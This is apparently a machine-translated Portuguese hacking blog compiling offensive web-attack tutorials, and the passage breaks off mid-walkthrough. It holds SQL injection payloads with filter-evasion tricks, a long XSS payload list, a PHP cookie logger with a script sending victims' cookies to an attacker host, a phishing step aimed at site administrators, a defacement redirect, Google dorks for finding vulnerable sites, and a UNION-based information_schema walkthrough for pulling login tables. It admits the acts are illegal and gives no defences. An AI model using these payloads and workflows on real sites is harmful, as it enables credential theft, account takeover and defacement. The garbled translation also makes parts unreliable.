Sql Injection


Zed Attack Proxy 2.0.0



  O Proxy Ataque Zed (ZAP) é uma ferramenta fácil de usar testes integrados de penetração para encontrar vulnerabilidades em aplicações web. Ele é projetado para ser usado por pessoas com uma ampla gama de experiência em segurança e, como tal, é ideal para desenvolvedores e testadores funcionais que são novos para testes de penetração. ZAP fornece scanners automáticos, bem como um conjunto de ferramentas que permitem a você para encontrar vulnerabilidades de segurança manualmente.
Link para windows: http://packetstormsecurity.com/files/download/119965/ZAP_2.0.0_Windows.exe Link para o Linux:  http://packetstormsecurity.com/files/download/119963/ZAP_2.0.0_Linux.tar.gz



Mole

Mole é um automático ferramenta SQL Injection exploração. Apenas fornecendo uma URL vulnerável e uma seqüência válida no site ele pode detectar a injeção e explorá-lo, usando a técnica de união ou uma técnica baseada em consulta booleana. O Mole usa uma interface de comando baseada, permitindo ao usuário para indicar a ação que ele quer executar facilmente. O CLI também fornece auto-realização em ambos os comandos e argumentos de comando, fazendo com que o usuário digite o menos possível.
Link: Aqui ou  http://sourceforge.net/projects/themole/files/latest/download?source=directory 
 
***



Dica: Comandos Usados na Hora da Injeção

sql


Olá caros leitores,
Venho disponibilizar a vocês uma lista de comandos postados por nosso amigo 5ubzer0.
São comandos úteis em uma injeção SQL.
Comandos:
Comandos basicos:
user(): Para conhecer o banco de dados do usuário ajuda a descobrir o PhpMyAdmin
version():Versão do Banco de Dados
database():Nome do Banco de Dados
@@datadir:Localização do Banco de Dados
+order+by+escobrir a Quantidade de Colunas
+union+select: Uniao das Colunas
Comandos de Extração:
Exemplos:
concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema)
concat_ws(0x3a3a3a,table_name,column_name)
concat(column_name,0x3a,table_schema,0x2e,table_na me)
group_concat(column_nome,0x3a,table_schema,0x2e,ta ble_nome)+from+information_schema.columns+where+co lumn_nome+like+char
Metodos de filtragem:
hex(unhex()
AES_ENCRYPT()
AES_ENCRYPT().
Exemplos:
/**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu mn_name) ,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1
/ ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** / from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / *
/*–*/ UNION/*–*/ select /*–*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*–*/ from /*–*/ INFORMATION_SCHEMA.COLUMNS/*–*/LIMIT /*–*/ 180,1 / *


Tutorial XSS Injection ( Cookies ) – COMPLETO

twitter_xss_ie8
Primeiro de tudo, eu traduzi ele no google e mudei algumas coisas, mais acho que deu pra entender, até porquê, eu aprendi a fazer XSS assim.. Espero que gostem!.
Aqui está um outro tutorial escrito por XSS mim. Começarão aprendizagem de hackers comigo.
Vou tentar fazer isso o mais breve possível, abrangendo apenas o básico para que ele ajuda a noobs a entender ;p
Então vou começar como sempre
O que é XSS?
Aqui está o wikipedia diz:
Cross-site scripting (XSS) é um tipo de computador vulnerabilidade de segurança normalmente encontrados em aplicações web que permite que atacantes para injetar client-side script em páginas da Web vistos por outros usuários. Um cross-site scripting vulnerabilidade pode ser usada por crackers para contornar os controles de acesso, como a política de mesma origem. Cross-site scripting realizadas em sites responderam por aproximadamente 80,5% de todas as vulnerabilidades de segurança documentadas pela Symantec a partir de 2007. [1] O seu efeito pode variar de um incômodo pequeno para um risco de segurança significativo, dependendo da sensibilidade dos dados manipulados pelo o site vulnerável ea natureza de qualquer atenuação de segurança implementada pelo proprietário do site.
Ataque!
Assim, nesta seção iremos aprender como usar XSS para ganhar controle sobre alguns website.So isto é para um noob real, que não sei nada sobre isso Sorrindo
Assim como em todos os hackers outro, XSS também começa por encontrar uma vulnerability.But você pode precisar fazer várias coisas para saber se um site é realmente vulnerável.
Então, em primeiro lugar, lembre-se this.A site que tem algo como uma caixa de pesquisa, espaço de login ou qualquer coisa semelhante é mais vulnerável XSS.
Portanto, para este primeiro ataque, nós estaremos usando uma caixa de pesquisa.
Então coloque este pequeno pedaço de código na caixa e pressione Enter Sorridente
Citação:

1
<script>alert("XSS")</script>
Agora você pode ver seu script de uma forma muito simples, portanto, incluída no script script tags.The é alertar uma mensagem simples, XSS.Now se uma pequena caixa pop uped dizendo XSS, parabéns! Seu site é vulnerável! Agora, se nada aparecer, isso significa que o site tem filtrado filtro it.This pode ser facilmente contornado por us.There muitos tipos de filtros e na maioria das vezes, o seu bloqueio da caixa de alerta.
Assim, em seu código, você encerrou a mensagem “XSS” em dupla quotes.So o sistema sabe que você está tentando XSS hackers desde que foi fechado em quotes.So dupla temos para criptografar a nossa mensagem para enganar o sistema inteligente?
Então, agora usamos uma função pouco chamado “String.fromCharCode” Então, o que isso faz é criptografar o nosso texto para linguagem ASCII .. Aqui está um exemplo de como parece.:
Citação:
String.fromCharCode(88,83,83)
Agora 88,83,83 são valores ASCII para XS S.Check este link para saber a tabela de conversão.
http://www.ascii.cl/
Não é necessário que Toungee
Então, agora digite o código recém-formatado na caixa de busca e aperte enter.
Citação:

1
<script>alert(String.fromCharCode(88,83,83))</script>
A coisa especial é que você não precisa usar aspas, neste caso, uma vez que esta função é usada Agora você deve obter a caixa pop-up na maioria dos casos.
Else há muitos pedaços de código outros que você pode inserir yourself.You pode fazer códigos e introduza-o se você sabe alguma codificação de sorriso
Aqui são pedaços de código mais alguns que eu encontrei na net que você pode usar para fazer isso:
Citação:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83)) </script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83) )</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,8 3))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
Essas consultas só deve ser capaz para você cortar qualquer tipo de websites.Even dos maiores sites pode estar tendo algumas vulnerabilidades XSS que você pode encontrar com estes idiotas.
Avançado XSS
Agora vamos aprender a usar essas coisas para atacar websites.Keep em mente que isso é completamente ilegal e você pode ser pego e pode ser cobrado por crime para fazer this.So tomar precauções sempre.
Roubar Cookies
Então, agora vamos usar o método Cookies roubar para fazer o attack.It é um tipo especial de biscoito / logger que registra o usuário que acessa esse page.So existem muitas maneiras de fazer isso, mas aqui é um método fácil.
Portanto, neste método, você precisará configurar um website.So ir para algum sites.I hospedagem preferem http://www.000webhost.com e criar uma conta no que website.Go para gerenciador de arquivos e criar um novo arquivo de texto em it.Name ele qualquer coisa como cookielog.txt ou algo parecido t that.Don ‘enter nada para ele it.Leave blank.Create outro arquivo txt e nomeie-o algo cookiellogger.txt.So exemplo different.For iremos adicionar algum código em -lo para que ele possa enviar logs para o file.So cookielog.txt abrir o arquivo de texto 2 e digite este código:
Citação:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<?php
if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
fclose($fp);
} else {
?>
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
function URLEncode(str)
{
// The Javascript escape and unescape functions do not correspond
// with what browsers actually do...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_.!~*'()"; // RFC2396 Mark characters
var HEX = "0123456789ABCDEF";
var plaintext = str;
var encoded = "";
for (var i = 0; i < plaintext.length; i++ ) {
var ch = plaintext.charAt(i);
if (ch == " ") {
encoded += "+"; // x-www-urlencoded, rather than %20
} else if (SAFECHARS.indexOf(ch) != -1) {
encoded += ch;
} else {
var charCode = ch.charCodeAt(0);
if (charCode > 255) {
alert( "Unicode Character '"
+ ch
+ "' cannot be encoded using standard URL encoding.\n" +
"(URL encoding only supports 8-bit characters.)\n" +
"A space (+) will be substituted." );
encoded += "+";
} else {
encoded += "%";
encoded += HEX.charAt((charCode >> 4) & 0xF);
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for
return encoded;
};
cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);
< ?php
}
?>
Então esse é o script.Agora no cookielogger precisamos mandar essa mensagem para o administrador do site website.So alvo mais provavelmente o administrador não vai olhar it.Since temos que convencê-lo, vamos encurtar o url.Go para http:// www.spam.com/ e encurtar a sua URL.And já que queremos adicionar vulnerabilidade, precisamos adicionar algum código também. Então, adicione este código após a URL e reduzi-lo.
Citação:

1
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
Envie o link para o administrador e esperar para que ele clique it.You precisa ter sorte para o administrador clicar nele Uma vez que ele clicou, você terá a cookie.Now você pode usar algumas ferramentas como o addon gerenciador de cookies que você começa para Mozilla e jogar em torno dele. Sua addon muito bom e realmente ajuda a fazer um monte!
Deface
Então agora podemos desfigurar a website.Isso é, a publicação que você ganhou controle sobre o site fazendo uma página de desfigurar ou something.Now você precisa usar um pequeno script para redirecionar todo mundo que visita o site para a página de desfigurar.
Citação:

1
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
Substitua a sintaxe com a sua página desfigurar site.
Ignorando o filtro XSS
Assim, na maioria das vezes, o simples script não vai dar o pop-up message.It costuma ignorar o filter.So você tem que usar algum outro methods.I irá discutir alguns deles abaixo.
Hex Bypass ( Ignorar )
Com personagens bloqueados como>, <, e /, é muito difícil de executar uma consulta de XSS. Não se preocupe, há sempre uma solução Sorrindo Você pode mudar seus personagens, em hexadecimal. A Hex de um determinado personagem, é basicamente o personagem, mas em um formato diferente. Estes devem ajudá-lo:
> =% 3c
<=% 3c
/ =% 2f
Ignorando ASCII
Com uma criptografia ASCII, podemos usar o caractere "Qual é bloqueado um pouco Este é um dos o filtro XSS mais comum ignora de todos os tempos Um script que você precisa para criptografar, ficaria assim...:
Citação:

1
<script>alert("XSS")</script>
E esta deve estar funcionando:
Citação:

1
<script> alert ("XSS") </ script>
Para criptografar a sua pequena parte de um script, vá a este site: http://www.wocares.com/noquote.php
Ignorando Case-Sensitive
Este tipo de cirurgia raramente funciona, mas vale sempre a pena um tiro. Alguns filtros são definidos no local para detectar determinadas seqüências, no entanto, as cordas do filtro que são bloqueados são caso sensível. Então, tudo o que precisamos fazer é executar um script, com diferentes tamanhos de caracteres. Este desvio, ficaria assim:
Citação:

1
<script> alert ("XSS") </ script>
Você também pode misturar isso com criptografia ASCII se você gosta. Este tipo de cirurgia só funciona em filtros realmente estúpido, ou aqueles realmente muito velho.
E por último, eu estou dando alguns idiotas XSS que você pode experimentar no Google.
Citação:

1
2
3
4
5
6
inurl: search.php?
inurl: find.php?
inurl: search.html
inurl: find.html
inurl: Search.aspx
inurl: find.aspx
Obrigado por ler...


Tutorial SQL Injection Avançado


sqlmap1
 SQL Injection
Com a popularização da internet e o crescimento dos diversos recursos foi
possível a criação de sites interativos e também, páginas de cadastro de
serviços diversos.
As informações colhidas em cadastros são gravadas em bancos de dados.
Bancos de dados são um conjunto de tabelas que armazenam informações,
lembrando que podem ser desde Nome e Idade até CPFs, números de cartão de crédito etc.

Mas, para haver comunicação entre a página e o banco de dados, é necessária uma linguagem extra. Nesses tempos atuais “de sofrimento e tortura”, a linguagem para bancos de dados mais usada em todo o mundo é a SQL.
SQL significa Structured Query Language, ou Linguagem de Consulta
Estruturada.
Surgida na década de 70, a SQL foi inicialmente criada pela IBM, mas logo
surgiram diversas variações da linguagem, criadas por outras empresas. Já ouviu falar em MySQL e Oracle e não sabia o que era? São as variações da SQL original, criadas pela MySQL AB e pela Oracle Corporation, respectivamente.
A SQL Injection, ou seja, “Injeção de SQL” é uma técnica muito fácil e também muito poderosa. Não são necessários scanners para achar sites vulneráveis e os comandos são enviados diretamente no navegador.
Isso faz da SQL Injection uma ótima técnica. O único pré-requisito para usar tal técnica é um conhecimento básico de SQL.
Aprendendo SQL
Os comandos em SQL são todos em inglês e não são complicados. Esse é o
motivo de ser a linguagem de bancos de dados mais usada no mundo. É esse também o motivo que favorece um invasor.
Os comandos que você precisa saber para fazer SQL Injection são: SELECT – Busca alguma informação do banco de dados e exibe; INSERT – Insere informações do banco de dados; DELETE – Apaga informações do banco de dados; UPDATE – Atualiza, ou seja, sobrescreve uma nova informação. As principais cláusulas, geralmente usadas com o SELECT, são: FROM – Especifica a tabela de onde serão retiradas informações. WHERE – Significa AONDE. HAVING – Significa TENDO. ORDER BY – Usado para ordenar algum resultado. Os operadores lógicos são: OR – Significa OU AND – Significa E NOT – Significa NÃO Os principais operadores de comparação são: < – Significa MENOR > – Significa MAIOR <> – Significa DIFERENTE <= – Significa MENOR OU IGUAL >= – Significa MAIOR OU IGUAL = - Significa IGUAL LIKE – Significa PARECIDO. ——————————————————————————————————- Nota
No operador LIKE usamos o sinal de porcentagem %. O % significa qualquer valor que esteja antes ou depois da palavra fornecida. Não confunda com asterisco (*)!
O % é somente usado no LIKE!
Strings são escritas entre aspas (‘ e ’);
Números são escritos normalmente;
Datas são escritas entre jogo-da-velha (#);
Quando quiser especificar mais de alguma coisa, use parênteses.
——————————————————————————————————- Nada melhor do que alguns exemplos para entender como funcionam as coisas. Aqui vão alguns exemplos: SELECT Usuário FROM Cadastro
SELECT * FROM Cadastro
SELECT Nome,Idade,Telefone FROM Cadastro
SELECT Nome,Idade FROM Cadastro WHERE Idade >= 18
SELECT Nome,CPF FROM Cadastro WHERE Nome LIKE %Fulano%
SELECT * FROM Cadastro ORDER BY Nome
INSERT INTO Cadastro (Nome,Idade) VALUES (‘Fulano’,24)
INSERT INTO Cadastro (Data,Rua) VALUES (#01-01-2008#,‘Rua dos Mortos’)
DELETE Nome FROM Cadastro
DELETE (Nome,Idade,Telefone) FROM Cadastro
DELETE Nome FROM Cadastro WHERE Nome LIKE %Fulano%
UPDATE Nome FROM Cadastro SET Nome=‘Beltrano’ WHERE Nome=‘Fulano’
UPDATE Nome FROM Cadastro SET Nome=‘Fulano’ WHERE Nome LIKE %Beltrano%
Traduzindo
Lembrando que SQL é puro e simples inglês, não é tão difícil entender os
exemplos acima.
SELECT Usuário FROM Cadastro” é a mesma coisa que falar ao banco de dados “Mostre a coluna Usuário da tabela Cadastro”. É também possível fazer o inverso, criar a consulta em língua normal e depois transcrever em SQL.
Essa tradução se trata do que em programação é chamado pseudo-código.
Um Pouco de Prática
Supondo que eu esteja dentro de uma página que usa a SQL para processar o login. Temos o campo de usuário e o campo de senha.
Estamos em uma página ASP (algumas são em PHP) e o código para capturar as entradas no formulário são:
campo_usuario = Request.Form(“usuário”)
campo_senha = Request.Form(“senha”)

A parte mais importante do código da página é:
SELECT (usuario,senha) FROM cadastro
WHERE usuario=’ & campo_usuario & ‘ AND senha=’ & campo_senha & ‘

Essas, você já deve ter percebido, são instruções SQL. Para os que não
conseguem traduzir, o código compara os dados fornecidos no formulário com os dados que estão guardados no banco de dados. Se o usuário e a senha batem, é efetuado o login na página.
Ótimo, temos um formulário simplíssimo de login numa página ASP usando SQL, com segurança. Com segurança? E o que acontece se digitarmos código malicioso, como ’ OR ‘1’=‘1, nos campos de usuário e senha? Vamos ver. O código em SQL executado seria esse:
SELECT (usuario,senha) FROM cadastro
WHERE usuario=’ ‘ OR ‘1’=’1 ‘ AND senha=’ ‘ OR ‘1’=’1 ‘

Vamos fazer uma tradução: “Pegue usuario e senha da tabela cadastro, aonde usuario é vazio ou verificar se 1 é igual a 1 e aonde senha é vazio ou verificar se 1 é igual a 1”, ou seja, ele procura por um campo vazio, ou verifica se 1 é igual a 1. Como 1 é igual a 1, ele entra como administrador, pois estávamos na página de login para administradores.
Em alguns casos, os administradores criam um campo vazio no banco de dados para testes e isso pode furar com sua invasão.
Aqui vão algumas strings: ’ OR ‘1’=‘1
’ OR ‘a’=‘a
’ OR ‘1
’ OR ‘’=‘
——————————————————————————————————-
* Não vou me aprofundar aqui por já haver outras explanações em post’s aqui no fórum
——————————————————————————————————-

Tente traduzir as strings e entender o que elas fazem na página.
[COLOR="Blue"]Quem Procura Acha[/COLOR]
Como o login é feito em páginas da web, podemos usar o Google para achar
páginas vulneráveis. Google tem vários truques, comandos escondidos que a maioria não usa. Como profissionais da área, nós a usamos.
Um destes comandos é o allinurl. Ele serve para retornar somente páginas que tenham determinados termos na URL. Aqui vão alguns exemplos:
allinurl:”admin/index.asp”
allinurl:”admin/login.asp”
allinurl:”admin/default.asp”
allinurl:”admin/admin.asp”
——————————————————————————————————-
* Não vou me aprofundar aqui por já haver outras explanações em post’s aqui no fórum
——————————————————————————————————-

(In)Felizmente, as páginas vulneráveis a SQL Injection estão ficando mais raras, mas ainda é possível achar uma e outra. Verifique página por página.
Prevenção
Preferi não indicar links, matérias ou comentários sobre prevenção (abordarei sobre o assunto em uma outra ocasião), também é preferível que se obtenha informações diretamente de outros autores aqui no forum ou na net (assim valorizamos os esforços de outros profissionais).
Advanced SQL Injection
Na matérias anteriores os caros leitores tiveram uma pequena introdução à SQL Injection (SQL); não foi grande coisa e o modo pelo qual injetávamos SQL, em campos, e para efetuar login está praticamente extinto. É com dificuldade que encontramos sites vulneráveis a técnica, como foi ensinada. Mesmo assim, é muito ignorante aquele que diz que a SQL Injection está morta. O que aconteceu foi que os administradores e web masters captaram a mensagem de que seus sistemas com campos eram vulneráveis e passaram a usar filtros.
Então a SQL Injection estava acabada, estagnada, esgotada e destruída?! Errado! Os administradores se esqueceram de que não são apenas os campos de login que usam SQL…
Nesses sites de empresas e de prefeituras, temos, como exemplo de página que requisita banco de dados, um portal de notícias. Na verdade, não é um requisito usar DBs (Data Base[s]), já vi alguns sites que usam páginas diferentes para as notícias, mas voltemos ao assunto…
As duas principais linguagens de programação voltadas à internet, tirando o HTML e o CSS, obviamente, são o PHP e o ASP. O PHP é uma iniciativa gratuita, criada por Rasmus Lerdof. Já o ASP é uma iniciativa paga criada pela Microsoft.
Na verdade, ambos não são apenas uma linguagem, mas sim todo um sistema que permite um scripting de qualidade. Ao menos, o PHP sim…
Reconhecer a linguagem no qual o portal de notícias é escrito é muito fácil.
Eu nem ia explicar isso, mas vamos dar uma ajudinha aos iniciantes…
Páginas em PHP tem a extensão .php:
Páginas em ASP tem a extensão .asp:
Sem exceção, os servidores que rodam .asp funcionam sob o Windows, por motivos óbvios: o ASP é feito pela Microsoft. Normalmente, usam o SQL Server, também da Microsoft, porém é possível que usem MySQL.
Já os servidores .php geralmente estão no GNU/Linux, usando MySQL, embora possam existir servidores que suportam PHP no Windows.
Basicamente, a linguagem que é utilizada é o SQL, porém toda a plataforma muda, sendo assim, técnicas como a utilização do LIMIT, em MySQL, não funcionam em SQL Server.
Os contrastes podem ser grandes no próprio site. Por exemplo, na maioria dos sites não há filtros contra esse tipo de SQL, porém alguns tem e podem ser burlados através de codificação e de Blind SQL Injection.
Quem nem ao menos sabe do que estou falando, não se preocupe, tudo será ensinado!
Comecemos, então
A técnica de SQL que utilizaremos é baseada na exploração do banco de dados através de erros exibidos, permitindo coletar informações como logins, senhas, endereços de e-mail e em alguns casos (sob SQL Server) executar comandos como se estivéssemos no prompt de comando.
Também nos permite efetuar defacement, entre várias outras opções.
Enfim, podemos utilizar todo o poder da SQL e fundi-la com XSS.
Encontrar páginas vulneráveis à SQL é muito fácil. Uma das melhores
ferramentas existentes para isso e de fácil acesso é o próprio Google, o mesmo buscador que utilizamos todos os dias para fazer trabalhos escolares e encontrar fotos, músicas, videos, etc… apesar de que para imagens é melhor desativar o SafeSearch…
Pois bem, as páginas que usam GET, ou seja, utilizam a URL para passar parâmetros são nas quais mais facilmente injetamos SQL. Sendo assim, o recurso inurl do Google é muito útil.
Em teoria, todas as páginas que utilizam SQL e não têm filtros estão vulneráveis à SQL, então, para encontrá-las, basta procurar páginas que obrigatoriamente usam SQL como portais de notícias por exemplo. Normalmente nestes portais; para facilitar o acesso, cada notícia recebe um ID e é a partir dele que injetaremos comandos SQL.
Sendo assim, as das muitas strings de busca no Google seriam: inurl:”noticias.php?id=”
inurl:”noticia.php?id=”
inurl:”ver_noticia.php?id=”
inurl:”ver.php?id=”
inurl:”abrir.php?id=”
inurl:”mostrar.php?id=”
Estes são só pequenos exemplos. (Lembrando que também existem páginas vulneráveis em ASP, sendo assim, a string deve ser adaptada).

Para descobrir a vulnerabilidade, basta uma aspa simples ( ) atrás do ?id=.
Se o sistema estiver utilizando MySQL e estiver vulnerável, o erro será este: ——————————————————————————————————-
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ‘‘‘ at line 1.
——————————————————————————————————-
Porém, se estiver utilizando SQL Server, este será o erro: ——————————————————————————————————-
Unclosed quotation mark after the character string ‘‘.
——————————————————————————————————-

Se nenhum erro for exibido, simplesmente a página não está vulnerável ou a abordagem deve ser melhor estruturada, ou seja, feita de meios diferentes. Às vezes, não serão exibidos erros a partir da simples inclusão do apóstrofo, mas serão de outros modos.
Algumas dicas são apagar o valor do ID e por o apóstrofo, ou substituir o valor do ID por null, não exibindo nenhuma notícia. Eu pessoalmente aprecio muito o null.
Também pode acontecer de a página estar vulnerável, mas não exibir esse erro, sendo necessária, como já disse, uma abordagem melhor feita.
Bom, não se preocupe se não encontrar uma página vulnerável na primeira tentativa, afinal, SQL Injection, com todos os seus modos de injeção, é a segunda vulnerabilidade mais popular em páginas da internet, perdendo apenas para XSS.
Páginas vulneráveis a SQL são extremamente comuns!
Expliquemos como faremos o sistema exibir um erro utilizando a aspa simples.
Pouparei a demasia nas explicações, até porque já abordei um pouco das SQL queries em outra ocasião.
Supondo que a query inicial seja:
SELECT noticia, data, autor FROM database.noticias WHERE id=’100′
E estamos pondo um apóstrofo, esta será a query:

SELECT noticia, data, autor FROM database.noticias WHERE id=’100”

O sistema vai tentar obter a notícia, a data, e o autor da notícia através da ID 100 e vai definir outra variável sem nome com a aspa simples do próprio sistema, ou seja, estamos fazendo uma operação impossível, e por isso o sistema acusa o erro. Tanto é que o SQL Server acusa unclosed quotation, “citação” aberta.
Conceitos de Bancos de Dados
Depois de encontrar uma página vulnerável, podemos começar a explorar o banco de dados. Antes de explorá-lo é necessário saber como funciona. Cada site pode ter uma ou mais conexões de bancos de dados, cada banco de dado pode ter uma ou mais tabelas, e cada tabela é divida em linhas e colunas.
Imagine que cada tabela é como uma planilha no Excel ou no Math.
Note que nos exemplos desta página, a query pede as colunas noticia, data e autor, da tabela noticias no banco de dados database.
Aprendendo SQL
Nas matérias anteriores eu já tinha abordado uma parte dos comandos que podemos utilizar em SQL e agora aqui estão mais alguns que serão necessários para os nossos trabalhos:
UNION – é usado para combinar o resultado de SELECT; ORDER BY – ordena as colunas utilizando como critério uma coluna; HAVING – “tendo”, ou seja, ser tiver certo critério!
Felizmente, na prática tudo se torna mais esclarecido.
MySQL
Tomemos como exemplo fictício um site cujo endereço é http://site.com.br. Neste site temos várias páginas, e uma delas é a noticias.php.
Acessando o endereço http://site.com.br/noticias.php?id=10’ recebemos o seguinte erro:
——————————————————————————————————-
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ‘‘‘ at line 1.
——————————————————————————————————-

Isso significa que está vulnerável. Se aparecer, ótimo, se não aparecer, não desista! É extremamente comum encontrar sites em PHP que não exibem a mensagem e estão vulneráveis. De qualquer modo, vale a pena tentar se aprofundar antes de simplesmente largar o site. Na verdade, esse passo não é estritamente necessário…
Com um site em mãos, vamos encontrar o número de colunas da tabela que está sendo usada para guardar as notícias, e a partir daí descobrir mais sobre o banco de dados inteiro. Utilizaremos o ORDER BY para tanto.
Vamos tentar número por número até chegar ao número certo de colunas, adicionando o seguinte após a URL , sem o que estiver entre os parênteses:
order by 2 — (notícia exibida)
order by 3 — (notícia exibida)
order by 4 — (notícia exibida)
order by 5 — (notícia exibida)
order by 6 — (erro)

Quando a notícia não é exibida, temos o seguinte erro:
——————————————————————————————————-
Unknown column ‘6’ in ‘order clause’
——————————————————————————————————-

Sabemos agora que a nossa tabela tem apenas cinco colunas – geralmente temos mais, já encontrei sites com dez colunas na tabela – podemos utilizar o UNION para explorar o banco de dados inteiro.
É possível deduzir que em uma query do tipo SELECT título, texto, autor, os resultados serão exibidos na página.
Com o UNION descobrimos quais resultados são exibidos na página e vamos substituir os resultados por qualquer outra query.
A partir de agora é interessante substituir o número do id da notícia por null, que não irá retornar nenhuma notícia e irá facilitar/permitir nosso trabalho.
Mas antes de descobrir o resto do sistema de MySQL, é racional descobrir o banco de dados em que estamos, afinal, imagine um site com mais de uma conexão de banco de dados criada pelo administrador, em qual estamos?
Utilizemos o seguinte esquema, após a URL:
null union select 1,2,3,4,5 from NOTEXIST –
Um erro semelhante a este é exibido:
Table ‘database.NOTEXIST’ doesn’t exist
O que acabamos de fazer é requisitar uma tabela que não existe, sem definir a conexão de banco de dados a que ela pertence, e o sistema, por padrão, adota a conexão atualmente utilizada, que no caso é database. Os dois traços no final, são sinais de comentários em SQL MySQL, para ignorar o resto da query que geraria um erro por causa do apóstrofo de fechamento.
Agora já podemos descobrir mais sobre o banco de dados em que estamos, inclusive possíveis tabelas que guardam informações de login. Para tanto, necessitamos descobrir que resultados de query são exibidos na página; utilizemos esta forma:
null union select 1,2,3,4,5 –
Os resultados variam de página para página, mas seria exibido algo como isso:
——————————————————————————————————-
Notícias
2
2 //1
3
——————————————————————————————————-

Outro exemplo de “displaying” é este:
——————————————————————————————————-
Notícias

5 – 2
4
———————————————————
+ FOTOS (clique na foto para ampliar)
———————————————————
Outras Matérias:
Ø 4/1/1933 – 3
——————————————————————————————————-
Então, escolhemos um ou mais números que são exibidos para explorar todo o sistema de banco de dados.
Supondo que na tela sejam exibidos 1, 2 e 3, como no primeiro exemplo, então usaremos na URL os lugares respectivos ao 3 para nossos objetivos e os outros números, mesmo o 4 e o 5, substituímos por null, ou não…
A Sun, que produz o MySQL quis facilitar o trabalho dos hackers administradores criando um banco de dados que armazena praticamente todas as informações interessantes, como nomes de conexões de bancos de dados, tabelas, colunas entre outras. A partir da versão 5.0 do MySQL temos a DB information_schema, que é amplamente utilizada em SQL.
Dentro da information_schema, temos as tabelas tables e columns que são muito importantes, creio que não seja necessário explicar o que elas guardam; dentro delas, há colunas que guardam todos os nomes de tabelas e colunas do sistema.
Além disso, há uma tabela em especial, que guarda a DB das tabelas e colunas definidas pelo administrador, a table_schema, que também será utilizada.
Primeiramente, vamos descobrir se estamos em um site com o MySQL anterior à 5.0, utilizando o seguinte depois da URL:
null union select 1,2,@@version,4,5 –
Resumidamente, o @@version é uma variável global que guarda a versão do sistema de banco de dados. Baseados nos resultados, que sempre tem o número da versão, temo-no…
Se estamos em um site que utilize 5.0 ou posteriores, ótimo. Se não, então teremos que chutar os nomes das tabelas, seguindo padrões de administração, e todo o papo que se refere à information_schema é inútil.
Alguns exemplos de @@version:
——————————————————————————————————-
5.0.67 –community

5.0.67 –community //1
3
——————————————————————————————————-
——————————————————————————————————-
//2
3

5.0.67 -community
——————————————————————————————————-
Comecamos descobrindo as tabelas no banco de dados que já descobrimos, o database, adicionando o seguinte à URL com o null que estávamos usando:
null union select 1,2,table_name,4,5 from information_schema.tables where table_schema=’database’ limit 0,1 –
Não é preciso dizer, é pedido um nome de tabela à information_schema.tables, quando a DB for database. Se tudo correr bem, teremos um nome de tabela:
——————————————————————————————————-
5 – 2

artigos
——————————————————————————————————-
Perfeito, descobrimos uma tabela, mas o nome dela é noticias, seu conteúdo, deduzimos, não é muito útil para nós, a menos que queiramos fazer um defacement.
Sobre o defacement, é preciso descobrir as colunas da tabela, isso nós veremos adiante.
E agora, como fazemos para descobrir mais tabelas?
Note que na query anterior, utilizei limit 0,1 no final. O limit servirá como um cursor entre as tabelas. Para avançar para a próxima tabela, utilizamos limit 1,1, depois limit 2,1 e assim sucessivamente, até encontrar todas as tabelas.
Supondo que tenhamos encontrado as tabelas “noticias”, “discursos”,
“compromissos”, “login” e “teste”. É altamente deduzível o conteúdo de cada uma, e basta prestar um pouco de atenção para perceber que os usuários e senhas estão armazenados na tabela login…
Agora será necessário descobrir as colunas de cada tabela, já que sem as colunas (onde estão guardados os dados e logins), não conseguimos obter dados. Seria como tentar acertar o meio de um alvo, sem a “mosca”.
Obter os nomes das colunas é muito parecido com obter as tabelas:
